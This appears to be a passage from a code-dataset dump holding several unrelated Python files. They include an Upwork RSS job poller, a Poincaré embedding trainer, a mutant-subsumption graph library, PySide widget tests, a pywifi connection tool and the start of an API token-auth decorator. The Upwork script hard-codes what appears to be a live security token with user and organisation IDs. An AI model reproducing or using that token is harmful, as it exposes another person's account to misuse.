urllib.request.urlopen('http://icanhazip.com')\nprint(r.read()) # check ips\n\nrss_url = \"https://www.upwork.com/ab/feed/topics/rss?securityToken=f95b63738835bc9997ec12f0401d48a82ebfebfc80616ce6bde4c1f3069dacc76c1b023b0fa37a4fe44262caae43bfbf8d35c9a8f60340545eef40dddf551148&userUid=454220209633980416&orgUid=454220209642369025\"\n\nsend_to_telegram = []\ncurrent_feed = [{'title':'value'}]\ndef update_feed(current_feed):\n\n updated_feed = feedparser.parse( rss_url )\n current_titles = []\n if updated_feed.status != 200:\n print('response code: ' + str(updated_feed.status))\n for current_entries in current_feed:\n current_titles.append(current_entries['title'])\n for new_items in updated_feed.entries:\n if new_items.title not in current_titles:\n send_to_telegram.append(new_items)\n for message in send_to_telegram:\n details = message['summary_detail']['value']\n details = details.replace('
', '')\n details = details.replace('•', '')\n details = details.replace(' ', '')\n details = details.replace('&', '')\n details = details.replace(''', '')\n details = details.replace('click to apply','')\n details = details.replace('Budget','\\n**Budget**')\n details = details.replace('Posted On','\\nPosted On')\n details = details.replace('Category','\\nCategory')\n details = details.replace('Country','\\nCountry')\n details = details.replace('Skills','\\nSkills')\n job_list=(message['title'], details, 'add tags')\n insert_jobs_list(job_list)\n\n for every in send_to_telegram:\n current_feed.append(every)\n return current_feed\n \nwhile True:\n if len(current_feed) > 50:\n to_remove = len(current_feed) - 50\n while to_remove != 0:\n current_feed.pop(to_remove - 1)\n to_remove-=1 \n print('after cleanting:')\n print(len(current_feed))\n current_feed = update_feed(current_feed)\n time.sleep(10)\n","repo_name":"r0mk/shelter","sub_path":"upwork_rss.py","file_name":"upwork_rss.py","file_ext":"py","file_size_in_byte":2323,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"31233055292","text":"import tqdm\nimport torch\nfrom torch import nn\n\nfrom function_tools import poincare_module, gmm_tools\nfrom optim_tools import optimizer\nfrom function_tools import poincare_function as pf\n\n\nclass RiemannianEmbedding(nn.Module):\n def __init__(self, n_exemple, cuda=False, lr=1e-2, verbose=True, negative_distribution=None):\n super(RiemannianEmbedding, self).__init__()\n self.cuda = cuda\n self.N = n_exemple\n self.W = poincare_module.PoincareEmbedding(n_exemple, 2)\n if(self.cuda):\n self.W.cuda()\n self.optimizer = optimizer.PoincareSGDExp(self.W.parameters(), lr=lr)\n self.verbose = verbose\n self.d = poincare_function.poincare_distance_dg\n if(negative_distribution is None):\n self.n_dist = torch.distributions.Categorical(torch.ones(self.N)/self.N)\n else:\n self.n_dist = negative_distribution\n\n def forward(self, x):\n return self.W(x)\n\n def get_PoincareEmbeddings(self):\n return self.W.l_embed.weight.data\n\n def set_lr(self, lr):\n for g in self.optimizer.param_groups:\n g['lr'] = lr\n \n def fit(self, dataloader, alpha=1.0, beta=1.0, gamma=0.0, pi=None, mu=None, sigma=None, max_iter=100,\n negative_sampling=5):\n \n if(pi is None):\n gamma = 0.0\n\n progress_bar = tqdm.trange(max_iter) if(self.verbose) else range(max_iter)\n for i in progress_bar:\n loss_value1, loss_value2, loss_value3, loss_pdf3 = 0,0,0,0\n for example, neigbhors, walks in dataloader:\n # # print(example.size(), neigbhors.size(), walks.size())\n # self.optimizer.zero_grad()\n # if(self.cuda):\n # example = example.cuda()\n # neigbhors = neigbhors.cuda()\n # walks = walks.cuda()\n # if(pi is not None):\n # pi = pi.cuda()\n # sigma = sigma.cuda()\n # mu = mu.cuda()\n # r_example = example.unsqueeze(1).expand_as(neigbhors)\n # me, mw = self.W(r_example), self.W(neigbhors)\n\n # loss_o1 = -(torch.log(torch.exp(-self.d(me, mw)))).sum(-1).sum(-1).mean()\n\n mw = self.W(walks)\n positive_d = (self.d(mw[:,:,0], mw[:,:,1]))\n\n with torch.no_grad():\n negative = self.n_dist.sample(sample_shape=(walks.size(0), walks.size(1), negative_sampling))\n if(self.cuda):\n negative = negative.cuda()\n negative = self.W(negative.long())\n negative_d = self.d(mw[:,:,0].unsqueeze(2).expand_as(negative), negative, j=-1) \n with torch.no_grad():\n grad_o2p = pf.poincare_distance_dg_b(mw[:,:,0], mw[:,:,1],p=2) \n p_d = torch.sigmoid(pf.poincare_distance_dg_f(mw[:,:,0], mw[:,:,1]))\n p_o = mw[:,:,0].expand_as(negative)\n n_d = torch.sigmoid(-pf.poincare_distance_dg_f(p_o,negative))\n grad_o2n = pf.poincare_distance_dg_b(p_o, negative,p=2)\n\n # # print(\"1 ->\", positive_d.sigmoid().view(-1))\n # # loss_o2 += (negative_d * (-negative_d).sigmoid().detach()).sum(-1)\n # loss_o2 = loss_o2.sum()\n # loss = loss_o2 \n # if(gamma > 0):\n # r_example = self.W(example).squeeze()\n # pi_z = pi[example].squeeze()\n # loss_o3 = (-torch.log(1e-4 + gmm_tools.weighted_gmm_pdf(pi_z.detach(), r_example, mu.detach(), sigma.detach(), self.d))).mean()\n # loss_value3 = loss_o3.item()\n # loss_pdf3 = torch.exp(-loss_o3).item()\n # loss += gamma * loss_o3\n\n\n # loss_value1 = loss_o1.item()\n # loss_value2 = loss_o2.item()\n # loss.backward()\n self.optimizer.step()\n if(self.verbose):\n progress_bar.set_postfix({\"O1\":alpha*loss_value1, \"O2\":beta *loss_value2, \"O3\":gamma *loss_value3, \"PDF\":loss_pdf3})\n print(self.W.l_embed.weight)\n print(self.W(torch.arange(self.N).cuda()).norm(2,-1))","repo_name":"tgeral68/EuuzAIiFDS","sub_path":"embedding_tools/poincare_pr_embeddings_graph.py","file_name":"poincare_pr_embeddings_graph.py","file_ext":"py","file_size_in_byte":4283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"38631878861","text":"from flask import Response\n\nfrom files_storage import FilesStorage\nfrom trading_source import TradingSource\nfrom transactions_calculator import TransactionsCalculator\n\n\nclass TradeService:\n def __init__(self, files_storage: FilesStorage, trading_source: TradingSource,\n transactions_calculator: TransactionsCalculator):\n self.files_storage = files_storage\n self.trading_source = trading_source\n self.transactions_calculator = transactions_calculator\n\n def trade(self, request):\n status = self.__validate_attachment(request)\n if status is not None:\n return status\n\n uploaded_file = request.files['file']\n file_path = self.files_storage.save(uploaded_file)\n self.trading_source.to_memory(file_path)\n return self.transactions_calculator.calculate(self.trading_source)\n\n def __validate_attachment(self, request):\n if 'file' not in request.files or request.files['file'] == '':\n return Response(\n \"Missing trading file\",\n status=400,\n )\n\n return None\n","repo_name":"alex-tilkin/edgify","sub_path":"trade_service.py","file_name":"trade_service.py","file_ext":"py","file_size_in_byte":1111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"40639434015","text":"import csv\nfrom typing import Set, Optional\n\n\nclass Node:\n tests: Set[int]\n mutant_identifier: Set[int]\n children: Set[int]\n parents: Set[int]\n size: int\n \"\"\"The node object that represents mutants\n All the functions in this .py file assume that mutants \n that are passed in are killable \n \n \"\"\"\n\n def __init__(self, mutant_name=None, tests=None):\n \"\"\" Initiates node object\n\n Creates a node that represents mutants. If the mutant_identifier and/or\n tests are passed in, it will set self.mutant_identifier and self.tests\n to the values passed in. Otherwise, the function initiates them as the\n empty set (Set[int]).\n\n\n\n Additionally, it initiates self.children and self.parents as empty\n sets (Set[int]).\n\n Parameters:\n mutant_identifier: set[int]\n The mutant's identifier is stored as a set so that when two\n indistinguishable mutants are merged their name, they could\n easily be identifiable (default None).\n tests: set[int]\n A set of test identifiers that fail for the mutant represented\n by this node (default None)\n\n Attributes:\n self.mutant_identifier: set[int]\n The mutant's identifier is stored as a set so that when two\n indistinguishable mutants are merged their name, they could\n easily be identifiable (default None).\n self.tests: set[int]\n A set of test identifiers that fail for the mutant represented\n by this node (default set[int])\n self.children: set[int]\n A set of nodes that are subsumed directly by this node. Children\n nodes represent mutants that are killed by a superset of tests\n that also kill this mutant(node). (default set[int])\n self.parents: set[int]\n A set of nodes that directly subsume this node. Parent nodes\n represent mutants that are killed by a subset of tests\n that also kill this mutant(node). (default set[int])\n\n \"\"\"\n if mutant_name is None:\n mutant_name = set()\n self.mutant_identifier = mutant_name\n if tests is None:\n tests = set()\n self.tests = tests\n self.children = set()\n self.parents = set()\n self.size = 1\n\n def get_descendents(self):\n result: Optional[set()] = set()\n for child in self.children:\n # add the child itself\n result.add(child)\n # if it has children add those too\n if child.children != set():\n result = result.union(child.get_descendents())\n return result\n\n def determine_mutant_subsumption(self, new_node, graph):\n\n \"\"\"Determines the new_node's placement compared to this node.\n\n Assumes that the nodes that are passed in are related and that this\n node and new_node are distinguishable nodes.\n\n If the nodes are distinguishable, and if the test identifiers in this\n node are a subset of the test identifiers in new_node, it will call\n update_dominant on this node. Otherwise, it will call update_subsumed.\n\n Parameters:\n new_node: Node\n A new node representing a mutant that is being added to the the\n graph\n graph: Graph\n A graph containing nodes that represent mutants\n\n \"\"\"\n # Determining dominance vs. subsumption using test identifiers\n if self.tests.issubset(new_node.tests):\n self.update_dominant(new_node, graph)\n\n else:\n self.update_subsumed(new_node, graph)\n\n def update_dominant(self, new_node, graph):\n \"\"\"Updates the dominant node on the graph with new_node.\n\n Assumes that this node is dominant with respect to the new_node.\n\n If this node has any children, for any given child of this node,\n it checks whether the child's set of test identifiers is a subset or\n superset of new_node's set of test identifiers.\n\n If child's set of test identifiers is a superset of new_node's test\n identifiers add_children_in_between is called on this node.\n\n If this node doesn't have any children, the function calls\n add_children on this node.\n\n Parameters:\n new_node: Node\n A new node representing a mutant that is being added to the the\n graph and is subsumed by this node\n graph: Graph\n A graph containing nodes that represent mutants\n \"\"\"\n # Check whether this node has children, and if yes, explore the\n # possibility of placing new_node relative to those children on the\n # graph\n # In a large graph, this case is more likely. Therefore, it is the\n # first possible choice in the conditional\n\n if len(self.children):\n children_can_relate = False\n for child in self.children.copy():\n if child.tests.issubset(new_node.tests):\n children_can_relate = True\n if child == new_node:\n continue\n else:\n # Determining where new_node is going to be on the graph\n # relative to the self's child\n child.determine_mutant_subsumption(new_node, graph)\n elif child.tests.issuperset(new_node.tests):\n children_can_relate = True\n # Adding node\n self.add_children_in_between(new_node, child)\n if not children_can_relate:\n self.add_children(new_node)\n # Base case: if this node doesn't have children, just add new_node as\n # its child\n else:\n self.add_children(new_node)\n\n def update_subsumed(self, new_node, graph):\n \"\"\"Updates the subsumed node on the graph with new_node.\n\n Assumes that this node is subsumed with respect to the new_node.\n\n If this node has any parents, for any given parent of this node,\n it checks whether the parent's set of test identifiers is a subset or\n superset of new_node's set of test identifiers.\n\n If the parents's set of test identifiers is a subset of new_node's\n test identifiers add_children_in_between is called on this node.\n\n If this node doesn't have any children, the function calls\n add_children on this node.\n\n Parameters:\n new_node: Node\n A new node representing a mutant that is being added to the the\n graph and is subsumed by this node\n graph: Graph\n A graph containing nodes that represent mutants\n \"\"\"\n # Check whether this node has parents, and if yes, explore the\n # possibility of placing new_node relative to those parents on the\n # graph\n # In a large graph, this case is more likely. Therefore, it is the\n # first possible choice in the conditional\n if len(self.parents):\n parents_can_relate = False\n for parent in self.parents.copy():\n if parent.tests.issuperset(new_node.tests):\n parents_can_relate = True\n if parent == new_node:\n continue\n else:\n # adding new_node as a relative of self's child\n parent.determine_mutant_subsumption(new_node, graph)\n elif parent.tests.issubset(new_node.tests):\n parents_can_relate = True\n parent.add_children_in_between(new_node, self)\n if not parents_can_relate:\n new_node.add_children(self)\n\n # Base case: if self doesn't have parents, just add new_node as its\n # parent (or add self as new_node's child)\n else:\n new_node.add_children(self)\n\n def add_children(self, new_node):\n \"\"\"Adds a child to this node\n\n Parameters:\n new_node: Node\n A new node representing a mutant that is being added to the\n graph\n\n \"\"\"\n self.children.add(new_node)\n new_node.parents.add(self)\n\n def add_children_in_between(self, new_node, child):\n \"\"\"Splits the edges between this node and its child to add new_node in\n between\n\n It changes and adds edges to the graph such that this node becomes\n the parent for new_node, and new_node becomes the parent of the child\n while preserving all other existing edges\n\n To do so, the function removes direct edges between this node and its\n child and adds a pair of edges between new_node and this node and\n another pair of edges between new_node and child\n\n Parameters:\n new_node: Node\n A new node representing a mutant that is being added to the\n graph\n child: Node\n A child node of this node that already exists on the graph\n \"\"\"\n new_node.parents.add(self)\n new_node.children.add(child)\n self.children.add(new_node)\n self.children.remove(child)\n child.parents.add(new_node)\n child.parents.remove(self)\n\n def merge_indistinguishable_nodes(self, n2, graph):\n \"\"\"Merges two nodes that represent mutants in a given graph\n\n Parameters:\n n2: Node\n Second mutant\n graph: Graph\n The graph containing these mutants\n \"\"\"\n self.mutant_identifier = self.mutant_identifier.union(\n n2.mutant_identifier)\n self.size += 1\n\n def is_distinguishable_from(self, n2):\n \"\"\"Determines whether two nodes are distinguishable using direct\n comparison and their test identifiers.\n\n Parameters:\n n2: Node\n The mutant being compared to this mutant\n\n Return:\n True if the this node and n2 represent mutants that are\n distinguishable; False otherwise.\n \"\"\"\n\n return (self != n2) and (self.tests != n2.tests)\n\n\nclass Graph:\n \"\"\"The graph object that represents the mutant domination graph\n \"\"\"\n\n def __init__(self):\n \"\"\"Initiates the graph object\n\n Attributes:\n self.nodes : List[Node]\n A list of nodes that represents mutants that are going to be\n added to the graph if create_edges is called on it\n \"\"\"\n self.nodes = []\n\n def add_node(self, new_node):\n \"\"\"Adds a given node to the list of the nodes on the graph\n\n If the node that is passed in doesn't have an equivalent node in class\n already, this function adds the given node to the list of nodes\n present in the graph, but it doesn't create a relation between the\n existing nodes and the newly added node.\n\n Parameters:\n new_node: Node\n Node that is being added to this graph\n\n \"\"\"\n if new_node not in self.nodes:\n\n for node in self.nodes:\n if not new_node.is_distinguishable_from(node):\n node.merge_indistinguishable_nodes(new_node, self)\n break\n\n else:\n self.nodes.append(new_node)\n\n def create_edges(self):\n \"\"\"Creates edges and connects the nodes that are already placed in the\n graph.\n\n Comparing all the nodes in the graph, it determines whether a\n relationship could exist between them by checking\n whether the sets of their test identifiers are a subset or superset\n of each other.\n\n \"\"\"\n for n1 in range(0, len(self.nodes)):\n\n for n2 in range(0, n1):\n\n # If at least the set of test identifiers in one of them is\n # not a subset of the other one, move on to the next node\n\n if not (self.nodes[n2].tests.issubset(\n self.nodes[n1].tests) or\n self.nodes[n2].tests.issuperset(\n self.nodes[n1].tests)):\n continue\n\n # If the nodes can have edges between them, determine their\n # subsumption relation\n else:\n self.nodes[n2].determine_mutant_subsumption(\n self.nodes[n1],\n self)\n\n def get_tests_covered(self, node):\n \"\"\"Returns all the tests covered by a mutant\n\n Recursively iterates from a node representing a dominator mutant to\n nodes with no children identifiers at the bottom of the subsumpsion\n graph.\n\n It then returns all the tests identifiers for the nodes with no\n children identifiers that are subsumed by the first node that was\n passed in.\n\n If a node has no children identifiers, then its tests identifiers are\n returned.\n\n Parameters:\n node: Node\n A node on the graph set[int]\n\n Returns:\n tests_covered: set[int]\n \"\"\"\n\n if node.children == set():\n return node.tests\n else:\n tests_covered = set()\n for child in node.children:\n tests_covered = tests_covered.union(\n self.get_tests_covered(child))\n\n return tests_covered\n\n\ndef calculate_dominating_mutants(kill_map):\n \"\"\"Calculates a dominating set of mutants\n\n Calculates the dominating set of mutants in a graph given a mapping from\n mutant identifiers to a set of identifiers of tests that kill each mutant.\n\n This function initializes a graph and adds all the mutant identifiers\n with their test identifiers in the kill map as initialized nodes to the\n graph.\n\n It then connects these nodes by establishing relationships between\n nodes that contain test identifiers that are a subset or superset of each\n other.\n\n Finally, it returns the graph containing these mutants and two minimal\n sets of mutants which contain a minimal set of test identifiers. One of\n these sets only contains name identifiers, whereas the second one\n contains node objects.\n\n\n Parameters:\n kill_map: A mapping from a set of identifiers from mutants killed to a\n set of identifiers for tests that kill each mutant.\n\n Returns:\n (tuple of three): containing\n graph : Graph\n The graph containing nodes that represent mutants\n dominator_mutants_set: set[int]\n The set of name identifiers of mutants in a dominating set.\n dominator_mutants_set_actual_mutant: set[Node]\n The set of Node objects representing mutants in a dominating\n set.\n \"\"\"\n\n graph = Graph()\n\n # initiate nodes and add them to the graph\n for mutant in kill_map:\n node = Node(mutant, kill_map.get(mutant))\n graph.add_node(node)\n\n # If possible, create edges between the nodes in the graph\n graph.create_edges()\n\n # Create a set of dominator mutants.\n # Any mutant(node) that doesn't have a parent is a dominator mutant\n dominator_mutants_set = set()\n dominator_mutants_set_actual_mutant = list()\n for mutants in graph.nodes:\n if mutants.parents == None or len(mutants.parents) == 0:\n dominator_mutants_set.add(mutants.mutant_identifier)\n dominator_mutants_set_actual_mutant.append(mutants)\n\n return graph, dominator_mutants_set, dominator_mutants_set_actual_mutant\n\n\ndef convert_csv_to_killmap(csv_filename):\n \"\"\"Converts a CSV file generated in Major framework to a killmap\n\n Parameters:\n csv_filename: .csv document\n A csv document generated by the Major framework containing a\n mapping from mutants to the tests they kill\n\n Returns:\n kill_map: A mapping from a set of identifiers from mutants killed to a\n set of identifiers for tests that kill each mutant.\n \"\"\"\n with open(csv_filename, newline='') as File:\n kill_map = {}\n reader = csv.reader(File)\n readerSize = csv.reader(File)\n\n # skipping the header\n next(reader)\n # print(readerSize)\n empty_csv_check = next(readerSize, \"empty\")\n if empty_csv_check != \"empty\" and len(empty_csv_check) == 2:\n\n for k, y in reader:\n # converting to integers\n k = int(k)\n y = int(y)\n j = frozenset({y})\n s = kill_map.get(j, set())\n s.add(k)\n kill_map[j] = s\n\n return kill_map\n else:\n for k, y, extra_column in reader:\n # converting to integers\n k = int(k)\n y = int(y)\n j = frozenset({y})\n s = kill_map.get(j, set())\n s.add(k)\n kill_map[j] = s\n return kill_map\n\n\ndef generate_dominator_set_with_csv(csv_filename):\n \"\"\"Calculates a dominating set of mutants given a CSV file containing the\n mapping from mutants to tests the kill\n\n See documentation for convert_csv_to_killmap and\n calculate_dominating_mutants.\n\n Parameters:\n csv_filename: .csv document\n A csv document generated by the Major framework containing a\n mapping from mutants to the tests they kill\n\n Returns:\n (tuple): containing\n graph : Graph\n The graph containing nodes that represent mutants\n dominator_mutants_set: set[int]\n The set of name identifiers of mutants in a dominating set.\n dominator_mutants_set_actual_mutant: set[Node]\n The set of Node objects representing mutants in a dominating\n set.\n \"\"\"\n kill_map = convert_csv_to_killmap(csv_filename)\n return calculate_dominating_mutants(kill_map)\n\n\ndef generate_dominator_set_with_csv_3_cols(csv_filename):\n \"\"\"Calculates a dominating set of mutants given a CSV file containing the\n mapping from mutants to tests the kill\n\n See documentation for convert_csv_to_killmap and\n calculate_dominating_mutants.\n\n Parameters:\n csv_filename: .csv document\n A csv document generated by the Major framework containing a\n mapping from mutants to the tests they kill\n\n Returns:\n (tuple): containing\n graph : Graph\n The graph containing nodes that represent mutants\n dominator_mutants_set: set[int]\n The set of name identifiers of mutants in a dominating set.\n dominator_mutants_set_actual_mutant: set[Node]\n The set of Node objects representing mutants in a dominating\n set.\n \"\"\"\n kill_map = convert_csv_to_killmap_3_columns(csv_filename)\n return calculate_dominating_mutants(kill_map)\n\n\n# TODO remove\ndef convert_csv_to_killmap_3_columns(csv_filename):\n \"\"\"Converts a CSV(with 3 columns) file generated in Major framework to a killmap\n\n Parameters:\n csv_filename: .csv document\n A csv document generated by the Major framework containing a\n mapping from mutants to the tests they kill\n\n Returns:\n kill_map: A mapping from a set of identifiers from mutants killed to a\n set of identifiers for tests that kill each mutant.\n \"\"\"\n with open(csv_filename, newline='') as File:\n kill_map = {}\n reader = csv.reader(File)\n\n # skipping the header\n next(reader)\n for k, y, extra_column in reader:\n # converting to integers\n k = int(k)\n y = int(y)\n j = frozenset({y})\n s = kill_map.get(j, set())\n s.add(k)\n kill_map[j] = s\n return kill_map\n\n\n#TODO remove\ndef generate_dominator_set_with_csv_3_col(csv_filename):\n \"\"\"Calculates a dominating set of mutants given a CSV(3 columns) file containing the\n mapping from mutants to tests the kill\n\n See documentation for convert_csv_to_killmap and\n calculate_dominating_mutants.\n\n Parameters:\n csv_filename: .csv document\n A csv document generated by the Major framework containing a\n mapping from mutants to the tests they kill\n\n Returns:\n (tuple): containing\n graph : Graph\n The graph containing nodes that represent mutants\n dominator_mutants_set: set[int]\n The set of name identifiers of mutants in a dominating set.\n dominator_mutants_set_actual_mutant: set[Node]\n The set of Node objects representing mutants in a dominating\n set.\n \"\"\"\n kill_map = convert_csv_to_killmap_3_columns(csv_filename)\n return calculate_dominating_mutants(kill_map)\n\n\n# TODO fix documentation\ndef convert_csv_to_reverse_killmap(csv_filename):\n \"\"\"Converts a CSV file generated in Major framework to a killmap\n\n Parameters:\n csv_filename: .csv document\n A csv document generated by the Major framework containing a\n mapping from mutants to the tests they kill\n\n Returns:\n kill_map: A mapping from a set of identifiers from mutants killed to a\n set of identifiers for tests that kill each mutant.\n \"\"\"\n with open(csv_filename, newline='') as File:\n kill_map = {}\n reader = csv.reader(File)\n readerSize = csv.reader(File)\n\n # skipping the header\n next(reader)\n # print(readerSize)\n empty_csv_check = next(readerSize, \"empty\")\n if empty_csv_check != \"empty\" and len(empty_csv_check) == 2:\n\n for k, y in reader:\n # converting to integers\n k = int(k)\n y = int(y)\n j = frozenset({k})\n s = kill_map.get(j, set())\n s.add(y)\n kill_map[j] = s\n\n return kill_map\n else:\n for k, y, extra_column in reader:\n # converting to integers\n k = int(k)\n y = int(y)\n j = frozenset({k})\n s = kill_map.get(j, set())\n s.add(y)\n kill_map[j] = s\n return kill_map\n\n\n# TODO document\ndef convert_csv_to_unique_killmap(csv_filename):\n # generate the graph\n graph = generate_dominator_set_with_csv(csv_filename)[0]\n nodes = graph.nodes\n unique_killmap: Optional[dict] = dict()\n for node in nodes:\n unique_killmap[node.mutant_identifier] = node.tests\n\n return unique_killmap\n\n\n# TODO document\ndef convert_csv_to_unique_reverse_killmap(csv_filename):\n killmap = convert_csv_to_unique_killmap(csv_filename)\n unique_reverse_killmap: Optional[dict] = dict()\n for mutant in killmap:\n for test in killmap[mutant]:\n s = unique_reverse_killmap.get(test, set())\n s.add(mutant)\n unique_reverse_killmap[test] = s\n return unique_reverse_killmap\n","repo_name":"ardier/minimal-dominator-mutant-set-generator","sub_path":"dominator_mutants.py","file_name":"dominator_mutants.py","file_ext":"py","file_size_in_byte":23025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"7939449514","text":"from observ import reactive\nimport pytest\n\npytest.importorskip(\"PySide6\")\n\nfrom PySide6 import QtWidgets\n\nimport collagraph as cg\n\n\ndef test_widget_size():\n renderer = cg.PySideRenderer(autoshow=False)\n widget = renderer.create_element(\"widget\")\n renderer.set_attribute(widget, \"size\", (600, 400))\n\n assert widget.size().width() == 600\n assert widget.size().height() == 400\n\n\ndef test_widget_close():\n closed = False\n\n def close(event):\n nonlocal closed\n closed = True\n\n renderer = cg.PySideRenderer(autoshow=False)\n widget = renderer.create_element(\"widget\")\n renderer.add_event_listener(widget, \"close\", close)\n\n widget.close()\n\n assert closed is True\n\n\ndef test_widget_as_window(qapp, qtbot):\n renderer = cg.PySideRenderer(autoshow=False)\n gui = cg.Collagraph(renderer=renderer, event_loop_type=cg.EventLoopType.QT)\n gui.render(cg.h(\"widget\", {}), qapp)\n\n def check_widget_as_window():\n windows = qapp.topLevelWidgets()\n assert len(windows) == 1\n\n qtbot.waitUntil(check_widget_as_window, timeout=500)\n\n\ndef test_widget_switch_layouts(qapp, qtbot):\n def SwitchLayouts(props):\n return cg.h(\"widget\", {\"layout\": {**props[\"layout\"]}})\n\n state = reactive({\"layout\": {\"type\": \"box\"}})\n\n renderer = cg.PySideRenderer(autoshow=False)\n gui = cg.Collagraph(renderer=renderer, event_loop_type=cg.EventLoopType.QT)\n gui.render(cg.h(SwitchLayouts, state), qapp)\n\n widget = None\n\n def check_widget():\n nonlocal widget\n windows = qapp.topLevelWidgets()\n assert len(windows) == 1\n widget = windows[0]\n\n qtbot.waitUntil(check_widget, timeout=1500)\n qtbot.waitUntil(\n lambda: isinstance(widget.layout(), QtWidgets.QBoxLayout), timeout=500\n )\n\n state[\"layout\"][\"type\"] = \"grid\"\n\n qtbot.waitUntil(\n lambda: isinstance(widget.layout(), QtWidgets.QGridLayout), timeout=500\n )\n\n state[\"layout\"][\"type\"] = \"form\"\n\n qtbot.waitUntil(\n lambda: isinstance(widget.layout(), QtWidgets.QFormLayout), timeout=500\n )\n\n state[\"layout\"][\"type\"] = \"box\"\n\n qtbot.waitUntil(\n lambda: isinstance(widget.layout(), QtWidgets.QBoxLayout), timeout=500\n )\n","repo_name":"fork-tongue/collagraph","sub_path":"tests/pyside/test_widget.py","file_name":"test_widget.py","file_ext":"py","file_size_in_byte":2214,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"32"} +{"seq_id":"34775155917","text":"# -*- coding:utf-8 -*-\nimport sys\nimport os\nimport time\nimport pywifi\nfrom pywifi import const\n\n#WIFI工具模拟客户端自动连接断开\nclass WiFi_tool(object):\n\n def __init__(self):\n #获取无线接口,并初始化\n self.wifi=pywifi.PyWiFi()\n self.iface=self.wifi.interfaces()[0]\n # print(self.iface)\n \n def get_interface_name(self):\n #获取当前无线接口名\n self.name=self.iface.name()\n print(self.name)\n return self.name\n\n def scan_wifi(self):\n # 起始获得的是列表,列表中存放的是无线网卡对象。\n # 可能一台电脑有多个网卡,请注意选择\n # 如果网卡选择错了,程序会卡住,不出结果。\n # ssid 是名称 ,signal 是信号强度\n self.iface.scan()\n time.sleep(3)\n result=self.iface.scan_results()\n # print(result)\n for i in range(len(result)):\n _ssid=result[i].ssid.encode(\"UTF-8\")\n _signal=result[i].signal\n _bssid=result[i].bssid\n print(u'SSID:%s,BSSID:%s,Signal:%s' % (_ssid.decode('UTF-8','strict'),_bssid,_signal))\n\n def connect_wifi(self,ssid,pwd):\n self.iface.disconnect()\n time.sleep(1)\n profile=pywifi.Profile()\n profile.ssid=ssid\n profile.auth=const.AUTH_ALG_OPEN\n profile.akm.append(const.AKM_TYPE_WPA2PSK)\n profile.cipher=const.CIPHER_TYPE_CCMP\n profile.key=pwd\n \n self.iface.remove_all_network_profiles()\n tmp_profile=self.iface.add_network_profile(profile)\n \n self.iface.connect(tmp_profile)\n time.sleep(8)\n \n if self.iface.status() == const.IFACE_CONNECTED:\n # return u'无线网卡已成功连接SSID'\n print(u'连接SSID成功')\n return True\n else:\n # return u'无线网卡连接SSID失败'\n print(u'连接SSID失败')\n return False\n \n def disconnect_wifi(self):\n #断开无线连接\n self.iface.disconnect()\n if self.iface.status() == const.IFACE_DISCONNECTED:\n print(u'断开WIFI连接成功')\n return True\n else:\n print(u'断开WIFI连接失败')\n return False\n\n def get_current_ssid(self):\n # result=os.system(u\"netsh wlan show interfaces\")\n result=os.popen(u\"netsh wlan show interfaces |findstr SSID\")\n #切割字符串\n text_str=result.read().split('\\n')[0].split(' ')[-1].strip()\n # print(text_str)\n return text_str\n \n def sys_ping(self,n):\n #ping设备LAN IP,检测是否连接成功\n # result=os.system(u'ping 192.168.1.1 -n %s' % n)\n re=os.popen(u'ping 192.168.1.1 -n %s' % n)\n text_str=re.read().strip()\n return text_str\n\n # def test_wifi(self,time,f):\n # i=0\n # while i<= f:\n # self.connect_wifi(ssid,pwd)\n # # time.sleep(time)\n # self.sys_ping(time)\n # self.diconnect_wifi()\n # f=f+1\n\n# class WRLO:\n # def write(self,msg): \n # fd = open(\"log.log\",'a+')\n # fd.write(msg)\n #fd.flush()\n \nif __name__ == \"__main__\":\n test=WiFi_tool()\n # test.scan_wifi()\n # test.get_interface_name()\n # test.connect_wifi(ssid='WiFi-Test',pwd='12345678')\n test.get_current_ssid()\n # test.test_wifi(time=5,f=3)\n # sys.stdout = WRLO()\n # test.sys_ping(n=5)\n # get_current_ssid()","repo_name":"alanfanh/wifi-tool","sub_path":"src/wifi_tool.py","file_name":"wifi_tool.py","file_ext":"py","file_size_in_byte":3514,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"10415236748","text":"import logging\n\nfrom flask_restful import reqparse, abort\nimport flask_restful\nfrom flask import current_app, request, g\nfrom functools import wraps\nfrom jormungandr.exceptions import RegionNotFound\nimport datetime\nimport base64\nfrom navitiacommon.models import User, Instance, db\n\n\ndef authentification_required(func):\n \"\"\"\n decorateur chargé de l'authentification des requetes\n fonctionne pour chaque API prenant un paramétre la région\n si la region est absente de la requéte la requete est automatique autorisé\n \"\"\"\n @wraps(func)\n def wrapper(*args, **kwargs):\n region = None\n if 'region' in kwargs:\n region = kwargs['region']\n #TODO revoir comment on gere le lon/lat\n elif 'lon' in kwargs and 'lat' in kwargs:\n try:\n from jormungandr import i_manager # quick fix to avoid circular dependencies\n region = i_manager.key_of_coord(lon=kwargs['lon'],\n lat=kwargs['lat'])\n except RegionNotFound:\n pass\n\n if not region:\n #we could not find any regions, we abort\n abort_request()\n\n if not region or authenticate(region, 'ALL', abort=True):\n return func(*args, **kwargs)\n\n return wrapper\n\n\ndef get_token():\n \"\"\"\n find the Token in the \"Authorization\" HTTP header\n two cases are handle:\n - the token is the only value in the header\n - Basic Authentication is used and the token is in the username part\n In this case the Value of the header look like this:\n \"BASIC 54651a4ae4rae\"\n The second part is the username and the password separate by a \":\"\n and encoded in base64\n \"\"\"\n if 'Authorization' not in request.headers:\n return None\n\n args = request.headers['Authorization'].split(' ')\n if len(args) == 2:\n try:\n b64 = args[1]\n decoded = base64.decodestring(b64)\n return decoded.split(':')[0]\n except ValueError:\n return None\n else:\n return request.headers['Authorization']\n\n\ndef authenticate(region, api, abort=False):\n \"\"\"\n Check the Authorization of the current user for this region and this API.\n If abort is True, the request is aborted with the appropriate HTTP code.\n \"\"\"\n if 'PUBLIC' in current_app.config \\\n and current_app.config['PUBLIC']:\n #if jormungandr is on public mode we skip the authentification process\n return True\n\n token = get_token()\n\n if not token:\n if abort:\n abort_request()\n else:\n return False\n\n user = get_user()\n if user:\n if 